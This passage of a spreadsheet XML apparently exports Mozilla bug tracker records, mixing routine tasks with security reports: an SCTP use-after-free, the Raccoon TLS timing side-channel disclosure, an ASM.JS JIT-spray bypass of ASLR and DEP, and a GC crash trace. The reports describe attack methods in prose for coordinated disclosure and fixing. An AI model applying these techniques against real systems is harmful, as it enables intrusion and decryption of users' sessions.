      </c>
      <c r="H1518" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1518" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J1518" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1518" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1518" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1518" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1518" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1518" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1518" t="inlineStr"/>
      <c r="Q1518" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1518" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1518" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1518" t="n">
        <v>1</v>
      </c>
      <c r="U1518" t="n">
        <v>0</v>
      </c>
      <c r="V1518" t="n">
        <v>5</v>
      </c>
      <c r="W1518" t="inlineStr">
        <is>
          <t>The Engagement Ratio ETL job is currently run via Airflow as a jupyter notebook[1][2]. This job powers the "Engagement Ratio" chart on the Firefox Dashboard[3].
It should be moved to python_mozetl, and have tests added.
[1] https://github.com/mozilla-services/data-pipeline/blob/master/reports/engagement_ratio/MauDau.ipynb
[2] https://github.com/mozilla/telemetry-airflow/blob/master/dags/main_summary.py#L28-L34
[3] https://metrics.services.mozilla.com/firefox-dashboard/</t>
        </is>
      </c>
      <c r="X1518" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1519">
      <c r="A1519" t="n">
        <v>508027</v>
      </c>
      <c r="B1519" t="inlineStr">
        <is>
          <t>2009-08-03 07:49:08 -0700</t>
        </is>
      </c>
      <c r="C1519" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Firefox 3.0.13 to bouncer</t>
        </is>
      </c>
      <c r="D1519" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1519" t="n">
        <v>1</v>
      </c>
      <c r="F1519" t="n">
        <v>1</v>
      </c>
      <c r="G1519" t="n">
        <v>5</v>
      </c>
      <c r="H1519" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1519" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1519" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1519" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1519" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1519" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N1519" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1519" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1519" t="inlineStr"/>
      <c r="Q1519" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1519" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1519" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1519" t="n">
        <v>1</v>
      </c>
      <c r="U1519" t="n">
        <v>0</v>
      </c>
      <c r="V1519" t="n">
        <v>2</v>
      </c>
      <c r="W1519" t="inlineStr">
        <is>
          <t>This is the request to move Solaris contrib. builds for Firefox 3.0.13 to
bouncer.
solaris-sparc:
http://releases.mozilla.org/pub/mozilla.org/firefox/releases/3.0.13/contrib/solaris_tarball/firefox-3.0.13.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
http://releases.mozilla.org/pub/mozilla.org/firefox/releases/3.0.13/contrib/solaris_tarball/firefox-3.0.13.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
http://releases.mozilla.org/pub/mozilla.org/firefox/releases/3.0.13/contrib/solaris_tarball/firefox-3.0.13.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
http://releases.mozilla.org/pub/mozilla.org/firefox/releases/3.0.13/contrib/solaris_tarball/firefox-3.0.13.en-US.opensolaris-i386.tar.bz2
Thanks.</t>
        </is>
      </c>
      <c r="X1519" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1520">
      <c r="A1520" t="n">
        <v>1080312</v>
      </c>
      <c r="B1520" t="inlineStr">
        <is>
          <t>2014-10-08 18:33:40 -0700</t>
        </is>
      </c>
      <c r="C1520" t="inlineStr">
        <is>
          <t>Crash in DataChannels/sctp timer loop when far-end is being debugged with GDB</t>
        </is>
      </c>
      <c r="D1520" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:34 -0700</t>
        </is>
      </c>
      <c r="E1520" t="n">
        <v>1</v>
      </c>
      <c r="F1520" t="n">
        <v>1</v>
      </c>
      <c r="G1520" t="n">
        <v>3</v>
      </c>
      <c r="H1520" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1520" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1520" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K1520" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1520" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1520" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1520" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1520" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1520" t="inlineStr">
        <is>
          <t>[webrtc-uplift][adv-main34+][adv-esr31.3+]</t>
        </is>
      </c>
      <c r="Q1520" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1520" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1520" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T1520" t="n">
        <v>1</v>
      </c>
      <c r="U1520" t="n">
        <v>0</v>
      </c>
      <c r="V1520" t="n">
        <v>23</v>
      </c>
      <c r="W1520" t="inlineStr">
        <is>
          <t>When debugging DataChannels, if one side is stalled (in gdb) for a long time, the other side may crash in a sctp-timer-processing routing accessing freed memory.
Crashes in user_sctp_timer_iterate.c:81:
if (c-&gt;c_time &lt;= ticks)
with c = 0xa5a5a5a5a5a5a5a5
Suspicion is that in processing one timer (and it drops to lock to process the timer) it freed another item on the list.  Michael Tuexen thinks he knows the actual cause.  Several people have seen this (and I'm fairly sure I've hit it before but never got a useful stack from it).
sec-crit because it uses the freed-memory-pointer to load a function pointer and call it.
Likely affects multiple releases as we haven't changed the SCTP library recently.</t>
        </is>
      </c>
      <c r="X1520" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1521">
      <c r="A1521" t="n">
        <v>1641795</v>
      </c>
      <c r="B1521" t="inlineStr">
        <is>
          <t>2020-05-29 02:17:41 -0700</t>
        </is>
      </c>
      <c r="C1521" t="inlineStr">
        <is>
          <t>Raccoon Attack (TLS specification timing side-channel)</t>
        </is>
      </c>
      <c r="D1521" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:15 -0800</t>
        </is>
      </c>
      <c r="E1521" t="n">
        <v>1</v>
      </c>
      <c r="F1521" t="n">
        <v>1</v>
      </c>
      <c r="G1521" t="n">
        <v>3</v>
      </c>
      <c r="H1521" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1521" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1521" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1521" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1521" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1521" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1521" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1521" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1521" t="inlineStr">
        <is>
          <t>[do not disclose before 9 September 2020][to be submitted to USENIX security end of June][adv-main78-]</t>
        </is>
      </c>
      <c r="Q1521" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1521" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1521" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1521" t="n">
        <v>1</v>
      </c>
      <c r="U1521" t="n">
        <v>0</v>
      </c>
      <c r="V1521" t="n">
        <v>14</v>
      </c>
      <c r="W1521" t="inlineStr">
        <is>
          <t>Created attachment 9152646
mod_lengths.txt
This e-mail was sent to security@mozilla.org this morning (CEST):
Dear Mozilla Security Team,
We are writing to inform you about a new timing side-channel attack in
the TLS *specification* we call "raccoon attack".
Please forward this report to the person responsible for TLS (NSS) in
your company.
Please treat this report as confidential, since we are trying to
coordinate the disclosure of this finding.
Since the vulnerability is present in the standard, it may well be
applicable to most implementations, but we did not check whether your
implementation specifically is vulnerable to this attack. The best way
for you to determine whether it is vulnerable is to consult your
developers responsible for TLS.
Your implementation is probably affected if one of the following
applies:
- It supports TLS\_DH\_ cipher suites
- It supports TLS\_DHE\_ cipher suites and it is possible to reuse
ephemeral public keys.
- It supports TLS\_DHE\_PSK cipher suites (a weaker form of the attack)
If none of these applies to your implementation, it is probably not
vulnerable and you can treat this report as a friendly heads up :).
**Vulnerability Details**
The core problem within the TLS specification is that for DH(E) the
computed PreMasterSecret (PMS) is supposed to be stripped from leading
zero bytes. This results in the PMS being sometimes longer, and
sometimes a little shorter. But since the PMS is then used to derive the
MasterSecret (MS), multiple potential side channels may arise that leak
the leading bits of the computed PMS. These leading bits can then be
used to compute the PMS if the same public Diffie-Hellman value is used
for multiple connections.
**Potential side channel 1: Hash function block border**
The PRF used to derive the MS is using HMAC internally with the PMS as
the key. If the PMS is longer than the block size of the hash function
within the HMAC (eg. 512 bit for SHA1, SHA256, or 1024 bit for SHA384),
the PMS has to be hashed before it is used as the HMAC key. Hashing of
inputs of different sizes is inherently not a constant time operation.
Whether the PMS reaches the block size obviously depends on the used
modulo. For standard size moduli (1024, 2048, 4096) it is not possible
to reach the block border of hash functions this way. We attached a list
of dangerous moduli sizes. If you are using a vulnerable moduli size, we
experimentally confirmed that the side channel is big enough such that
the attack can be executed over LAN. 
**Potential side channel 2: Hash function padding**
Initially, we thought that this just becomes an issue if the PMS is
close to the block size of the hash function (hashing one block vs
hashing two blocks), but experiments showed that a lot of
implementations are also not constant time within a single block. We
attribute this to internal copy operations or the adding of padding
within the hash function. We believe that this kind of side channel is
usually only exploitable in a co-located setup.
**Potential side-channel 3: HMAC key padding**
If the PMS is smaller than the block size of the hash function, the key
has to be padded to the hash function size. This can also create a
timing side channel. 
**Potential side channel 4: DHE\_PSK**
For DHE\_PSK the PMS is constructed differently. Instead of using the
PMS from the Diffie-Hellman computation directly, the PMS is constructed
as:
PMS\* = Length \| PMS \| Length \| PSK
This results in a change of the length of the PMS\* which is fed into
the hash function. For some PSK lengths, this can leak the length of the
PSK, even if the public DH value of the server is not reused. More
dramatically, if the attacker is a legitimate user and can choose a PSK
for his own account, he can use this to guarantee that PMS\* always gets
close to the critical block border.
**Potential side channel 5: Direct answers**
We saw that some implementations do not require a timing side channel
for exploitation at all since they behave differently if the PMS starts
with a zero byte (e.g., by sending an alert message). This is a bug in
itself, since this means that a fraction of the TLS connections fail
even if no attacker is present. With this bug, the vulnerability is
exploitable by simply observing server responses, without the need for
accurate timing measurements.
**Remediation**
This is an issue in the TLS specification. Without special care of the
handling of the PMS the side channel will be present. We recommend not
reusing the ephemeral public keys. This leaves the core of the
vulnerability open but makes it not exploitable. Last but not least we
recommend making sure the key derivation runs in constant time even if
the PMS has varying size. To do this, similar techniques as for Lucky13
mitigation can be applied.
**Attack Explanation**
A sophisticated attacker may be able to exploit this timing behavior as
follows: The attacker intercepts a (DH) CKE message (g\^a mod p) for
which he wants to decrypt a session. The attacker then starts a lot of
connections on his own, where he sends his public key as g\^a \* g\^s
mod p for arbitrary values of s, followed by a CCS and an invalid
finished message. The server then computes the PMS as g\^ab \* g\^sb mod
p. The attacker measures the time it took for the implementation to
respond to the invalid finished message. He then tries to identify the
handshakes for which g\^ab \* g\^sb resulted in a PMS with at least one
leading zero byte by looking at the execution time. The attacker can
construct and solve an instance of the Hidden Number Problem to recover
g\^ab (for example using common techniques to find the shortest vector
in a lattice) and decrypt the targeted session.
Note that for some moduli this setup does not leak a single byte, but
might leak more than one byte. For example, for a 1036 bit modulus, we
can measure the block borders for SHA384 with a 12-bit leak. In this
specific case, the attacker needs to collect roughly 107 equations with
2\^12 \* 107 \~= 439000 connections (assuming perfect timing
measurements), and can then recover the shared secret of a past session
in under 20 minutes using lattice techniques.
For the important case of an 8-bit leak, the lattice techniques we used
were not successful with our modest computational power. It probably
requires a lot more measurements and intensive computational efforts.
However, an attacker can always continue measuring until he gets
equations that leak more than the top 8 bits. It is also possible that
other techniques to solve the hidden number problem (besides lattices)
can be applied to improve the result.
**ECDH(E)**
ECDH(E) is not directly affected by this issue, as in ECDH(E) the PMS is
always padded with zero bytes. Note that this padding might introduce
another side channel that will leak the top bits of the PMS again. We
have not yet investigated whether this potential leak can be exploited. 
**FF-DHE TLS 1.3**
TLS 1.3 preserves the leading zero bytes of the shared secret. If a
potential padding of the shared secret does not introduce a timing
side-channel, the attack is not applicable to TLS 1.3 directly. However,
if the public DH value of a TLS 1.3 session is shared with TLS 1.2
session the attack becomes possible again. 
**Disclosure Timeline**
As you can imagine, a lot of different people have to deal with this
issue currently. We want to coordinate the disclosure such that everyone
gets an appropriate time to respond to this issue. We plan to submit our
research to USENIX Security 2021 (in roughly 3 weeks), but we will
commit to not make our research publicly available before September 1st
2020. We would appreciate it if you would also keep this report
confidential until then.
**Additional Information**
If you need additional help with this report or require additional
clarification, feel free to contact us.
If you think this report applies to your library and you take measures
to mitigate it, we would appreciate hearing from you about the actions
you have taken.
**Contact**
Robert Merget ([*robert.merget\@rub.de*](mailto:robert.merget@rub.de)) 
Marcus Brinkmann
([*marcus.brinkmann\@rub.de*](mailto:marcus.brinkmann@rub.de)) 
Nimrod Aviram
([*nimrod.aviram\@gmail.com*](mailto:nimrod.aviram@gmail.com)*)*
Juraj Somorovsky
([*juraj.somorovsky\@upb.de*](mailto:juraj.somorovsky@upb.de)) 
Kind Regards
Robert Merget, Marcus Brinkmann, Nimrod Aviram, Juraj Somorovsky</t>
        </is>
      </c>
      <c r="X1521" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1522">
      <c r="A1522" t="n">
        <v>868104</v>
      </c>
      <c r="B1522" t="inlineStr">
        <is>
          <t>2013-05-02 11:47:54 -0700</t>
        </is>
      </c>
      <c r="C1522" t="inlineStr">
        <is>
          <t>Update the homepage of MDN</t>
        </is>
      </c>
      <c r="D1522" t="inlineStr">
        <is>
          <t>2020-05-15 11:41:36 -0700</t>
        </is>
      </c>
      <c r="E1522" t="n">
        <v>1</v>
      </c>
      <c r="F1522" t="n">
        <v>1</v>
      </c>
      <c r="G1522" t="n">
        <v>6</v>
      </c>
      <c r="H1522" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1522" t="inlineStr">
        <is>
          <t>developer.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J1522" t="inlineStr">
        <is>
          <t>Design</t>
        </is>
      </c>
      <c r="K1522" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1522" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1522" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1522" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1522" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1522" t="inlineStr"/>
      <c r="Q1522" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1522" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1522" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1522" t="n">
        <v>1</v>
      </c>
      <c r="U1522" t="n">
        <v>0</v>
      </c>
      <c r="V1522" t="n">
        <v>4</v>
      </c>
      <c r="W1522" t="inlineStr">
        <is>
          <t>Update the home page to have new content - proposed content is in the etherpad: https://etherpad.mozilla.org/mdn-20homepage-20content
we are not going to do a full scale redesign at this point, so the layout should reflect working within the current design &amp; CSS of the homepage.</t>
        </is>
      </c>
      <c r="X1522" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1523">
      <c r="A1523" t="n">
        <v>571995</v>
      </c>
      <c r="B1523" t="inlineStr">
        <is>
          <t>2010-06-14 15:22:43 -0700</t>
        </is>
      </c>
      <c r="C1523" t="inlineStr">
        <is>
          <t>Crash [@ BuildTextRunsScanner::BreakSink::SetBreaks(unsigned int, unsigned int, unsigned char*)] with crazy -moz-column testcase</t>
        </is>
      </c>
      <c r="D1523" t="inlineStr">
        <is>
          <t>2013-05-18 18:14:53 -0700</t>
        </is>
      </c>
      <c r="E1523" t="n">
        <v>1</v>
      </c>
      <c r="F1523" t="n">
        <v>1</v>
      </c>
      <c r="G1523" t="n">
        <v>3</v>
      </c>
      <c r="H1523" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1523" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1523" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1523" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1523" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1523" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1523" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1523" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1523" t="inlineStr">
        <is>
          <t>[sg:critical][critsmash:investigating]</t>
        </is>
      </c>
      <c r="Q1523" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1523" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1523" t="inlineStr">
        <is>
          <t>mozilla2.0b7</t>
        </is>
      </c>
      <c r="T1523" t="n">
        <v>1</v>
      </c>
      <c r="U1523" t="n">
        <v>0</v>
      </c>
      <c r="V1523" t="n">
        <v>52</v>
      </c>
      <c r="W1523" t="inlineStr">
        <is>
          <t>Created attachment 451142
testcase (crashes 1.9.1 and 1.9.2 Firefox when loaded)</t>
        </is>
      </c>
      <c r="X1523" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1524">
      <c r="A1524" t="n">
        <v>1334933</v>
      </c>
      <c r="B1524" t="inlineStr">
        <is>
          <t>2017-01-29 15:34:34 -0800</t>
        </is>
      </c>
      <c r="C1524" t="inlineStr">
        <is>
          <t>targeted ASM.JS JIT-Spray allows bypassing ASLR and DEP</t>
        </is>
      </c>
      <c r="D1524" t="inlineStr">
        <is>
          <t>2024-05-30 09:25:32 -0700</t>
        </is>
      </c>
      <c r="E1524" t="n">
        <v>1</v>
      </c>
      <c r="F1524" t="n">
        <v>1</v>
      </c>
      <c r="G1524" t="n">
        <v>3</v>
      </c>
      <c r="H1524" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1524" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1524" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1524" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1524" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1524" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1524" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1524" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1524" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+][adv-esr45.8+]</t>
        </is>
      </c>
      <c r="Q1524" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1524" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1524" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T1524" t="n">
        <v>1</v>
      </c>
      <c r="U1524" t="n">
        <v>0</v>
      </c>
      <c r="V1524" t="n">
        <v>57</v>
      </c>
      <c r="W1524" t="inlineStr">
        <is>
          <t>Created attachment 8831573
ASM.JS JIT-Spray (Nop-Sled) against 51.0.1 and Nightly
Dear Mozilla Team,
The mitigations made against bug 1325200 can be circumvented, and hence, ASM.JS
JIT-Spray in combination with heap spray still allows to fully bypass ASLR and
DEP in 32-bit Firefox on Windows. An attacker can directly jump to his controlled
machine code without resorting to memory-disclosures/info-leaks and code reuse,
when exploiting a memory corruption vulnerability.
As stated in comment #52 of bug 1325200, the attacker first occupies many memory
regions to decrease the entropy of possible 64KB aligned base addresses and then
forces the creation of max. allowed ASM.JS code regions. As shown in the PoC,
his controlled machine code lands at predictable addresses. (Can you reproduce?)
I think the best mitigations are 1) random nop insertion and 2) constant
blinding of four-byte constants:
1) Inserting different-sized nop-like instructions (such as "lea esp, [esp]" and
"nop dword [REG32 + OFFSET]") at random locations into the stream of machine code
instructions decreases the possiblilty to hit a sprayed nop sled. Therefore, each
JIT module should have different random nops. Even if the attacker hits a nop
sled, the instruction stream may "re-synchronize" and his payload becomes
unusable.
2) If four-byte constants are blinded only two(/one)-byte constants can be used to
hide attacker-controlled machine instructions. However, in combination with 1) I
doubt that an attacker can do anything meaningful with
that.
Of course both mitigations may have an unacceptable performance overhead :/.
Still, I hope this helps.
If you need more information, please let me know.
Best,
    Rh0
P.S.:
If requested I can provide a PoC with more code execution (.e.g.:
WinExec("cmd")) soon.</t>
        </is>
      </c>
      <c r="X1524" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1525">
      <c r="A1525" t="n">
        <v>1816158</v>
      </c>
      <c r="B1525" t="inlineStr">
        <is>
          <t>2023-02-10 09:44:09 -0800</t>
        </is>
      </c>
      <c r="C1525" t="inlineStr">
        <is>
          <t>js::gc::detail::CellHasStoreBuffer (cell=0xe5e5e5e5e5e5e5e5)</t>
        </is>
      </c>
      <c r="D1525" t="inlineStr">
        <is>
          <t>2024-06-02 11:57:03 -0700</t>
        </is>
      </c>
      <c r="E1525" t="n">
        <v>1</v>
      </c>
      <c r="F1525" t="n">
        <v>1</v>
      </c>
      <c r="G1525" t="n">
        <v>3</v>
      </c>
      <c r="H1525" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1525" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1525" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1525" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1525" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1525" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1525" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1525" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1525" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main112+]</t>
        </is>
      </c>
      <c r="Q1525" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1525" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S1525" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T1525" t="n">
        <v>1</v>
      </c>
      <c r="U1525" t="n">
        <v>0</v>
      </c>
      <c r="V1525" t="n">
        <v>15</v>
      </c>
      <c r="W1525" t="inlineStr">
        <is>
          <t>Created attachment 9317107
crash2.js
Steps to reproduce:
On git commit b25ff1fab82c2d3a91531ad3735e50422407b163, the attached sample crashes with a stack trace indicating some kind of GC issue (or a debugger issue?). The sample is extremely flaky and I failed to minimize it (sorry about that). I'm also attaching a python script that runs `rr record` in a loop until the crash is detected. The script is supposed to be placed at the root of the firefox source folder, alongside with the `crash2.js` file. Please check the script before running; it is `rm'ing` the rr output directory (`/tmp/BBB`) unless there is a crash detected. The script runs for some time, it might take a couple of hundred executions.
```
#0  0x000055baeb129ab5 in js::gc::detail::CellHasStoreBuffer (cell=0xe5e5e5e5e5e5e5e5)
    at obj-x86_64-pc-linux-gnu/dist/include/js/HeapAPI.h:594
#1  0x000055baeb129a94 in js::gc::IsInsideNursery (cell=0xe5e5e5e5e5e5e5e5)
    at obj-x86_64-pc-linux-gnu/dist/include/js/HeapAPI.h:601
#2  0x000055baeb1299b5 in js::gc::Cell::isTenured (this=0xe5e5e5e5e5e5e5e5)
    at js/src/gc/Cell.h:195
#3  0x000055baeb14f107 in js::gc::ReadBarrierImpl (thing=0xe5e5e5e5e5e5e5e5)
    at js/src/gc/Cell.h:563
#4  0x000055baeb14f020 in js::gc::ReadBarrier&lt;JSObject&gt; (thing=0xe5e5e5e5e5e5e5e5)
    at js/src/gc/Cell.h:539
#5  0x000055baeb14eff5 in js::InternalBarrierMethods&lt;JSObject*, void&gt;::readBarrier (
    v=0xe5e5e5e5e5e5e5e5) at js/src/gc/Barrier.h:351
#6  0x000055baebe8bc05 in js::InternalBarrierMethods&lt;js::Debugger*, void&gt;::readBarrier (
    dbg=0x26c22b106300) at js/src/debugger/Debugger.h:1279
#7  0x000055baebe8bbd8 in js::ReadBarriered&lt;js::Debugger*&gt;::read (this=0x26c22b1ee2b0)
    at js/src/gc/Barrier.h:836
#8  0x000055baebe8bb82 in js::WeakHeapPtr&lt;js::Debugger*&gt;::get (this=0x26c22b1ee2b0)
    at js/src/gc/Barrier.h:889
#9  0x000055baebe1aa15 in js::WeakHeapPtr&lt;js::Debugger*&gt;::operator js::Debugger* const&amp; (
    this=0x26c22b1ee2b0) at js/src/gc/Barrier.h:898
#10 0x000055baebde3215 in js::Debugger::forEachOnStackDebuggerFrame&lt;js::DebugAPI::slowPathOnNewGenerator(JSContext*, js::AbstractFramePtr, JS::Handle&lt;js:
:AbstractGeneratorObject*&gt;)::$_14&gt;(js::AbstractFramePtr, js::DebugAPI::slowPathOnNewGenerator(JSContext*, js::AbstractFramePtr, JS::Handle&lt;js::AbstractGe
neratorObject*&gt;)::$_14) (frame=..., fn=...) at js/src/debugger/Debugger.cpp:3284
#11 0x000055baebde30c0 in js::DebugAPI::slowPathOnNewGenerator (cx=0x7fdc3762f100, frame=...,
    genObj=...) at js/src/debugger/Debugger.cpp:1261
#12 0x000055baeb5c954c in js::DebugAPI::onNewGenerator (cx=0x7fdc3762f100, frame=..., genObj=...)
    at js/src/debugger/DebugAPI-inl.h:88
#13 0x000055baeb5c8a79 in js::AbstractGeneratorObject::createFromFrame (cx=0x7fdc3762f100, frame=...)
    at js/src/vm/GeneratorObject.cpp:81
#14 0x000055baeb2e93f6 in Interpret (cx=0x7fdc3762f100, state=...) at js/src/vm/Interpreter.cpp:4287
#15 0x000055baeb2d1980 in js::RunScript (cx=0x7fdc3762f100, state=...) at js/src/vm/Interpreter.cpp:431
#16 0x000055baeb2f096c in js::ExecuteKernel (cx=0x7fdc3762f100, script=..., envChainArg=..., evalInFrame=..., result=...) at js/src/vm/Interpreter.cpp:81
2
#17 0x000055baeb2f1215 in js::Execute (cx=0x7fdc3762f100, script=..., envChain=..., rval=...)
    at js/src/vm/Interpreter.cpp:844
```</t>
        </is>
      </c>
      <c r="X1525" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1526">
      <c r="A1526" t="n">
        <v>1558928</v>
      </c>
      <c r="B1526" t="inlineStr">
        <is>
          <t>2019-06-12 13:17:21 -0700</t>
        </is>
      </c>
      <c r="C1526" t="inlineStr">
        <is>
          <t>socorro deploy: 383</t>
        </is>
      </c>
      <c r="D1526" t="inlineStr">
        <is>
          <t>2019-06-12 14:55:21 -0700</t>
        </is>
      </c>
      <c r="E1526" t="n">
        <v>1</v>
      </c>
      <c r="F1526" t="n">
        <v>1</v>
      </c>
      <c r="G1526" t="n">
        <v>4</v>
      </c>
      <c r="H1526" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1526" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1526" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K1526" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1526" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1526" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1526" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1526" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1526" t="inlineStr"/>
      <c r="Q1526" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1526" t="inlineStr">
        <is>
